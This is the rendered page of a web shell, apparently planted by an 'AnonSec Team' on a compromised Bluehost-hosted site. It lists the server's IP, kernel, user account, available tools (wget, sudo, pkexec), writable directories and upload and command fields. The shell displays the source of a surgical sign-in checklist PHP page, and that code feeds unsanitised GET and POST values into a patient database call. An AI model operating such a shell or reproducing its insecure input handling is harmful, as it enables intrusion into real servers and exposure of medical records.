Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.221.142.39
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Before_Conduction.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
if(isset($_POST['Before_Conduction'])) 
{
   PatientManager::BeforeConduction("$_GET[prescriptionid]","$_GET[patientid]","$_GET[surgeryid]","$_POST[Anesthesia_Safety]","$_POST[Pulse_Oximeter]","$_POST[Known_Allergy]","$_POST[Difficult_Airways]","$_POST[Risk_500]","$_POST[enteredby]");
}
?>

 <form name="signup" method="post" >

<table id="example2" class="table table-bordered table-hover"> 
  <div class="center">
      <h3 align="center">Before Conduction Of Sign In </h3><br>
      
      <tr>
<td><span style="font-size: 20px">Anesthesia Safety Check Completed </span></h3></td><td><label class="switch">
  <input type="checkbox" name='Anesthesia_Safety'>
  <span class="slider"></span>
</label>
</td>
<td><span style="font-size: 20px">Pulse Oximeter On And Functioning
</span></h3></td><td><label class="switch">
  <input type="checkbox" name='Pulse_Oximeter'>
  <span class="slider"></span>
</label>
</td>
</tr>  

<tr>
<td><span style="font-size: 20px">Does Patient Have A Known Allergy</span></h3></td><td><label class="switch">
  <input type="checkbox" name='Known_Allergy'>
  <span class="slider"></span>
</label>
</td>
<td><span style="font-size: 20px">Difficult Airways/Aspiration Risk?
</span></h3></td><td><label class="switch">
  <input type="checkbox" name='Difficult_Airways'>
  <span class="slider"></span>
</label>
</td>
</tr>  
<tr>
<td><span style="font-size: 20px">Risk of 500 ML or more Blood Loss      
</span></h3></td><td><label class="switch">
  <input type="checkbox" name='Risk_500'>
  <span class="slider"></span>
</label>
</td>
</tr> 
      
          </div>      
          
          
</table>
<input type='submit' name='Before_Conduction' value='Submit'>
</form>

Anon7 - 2022
AnonSec Team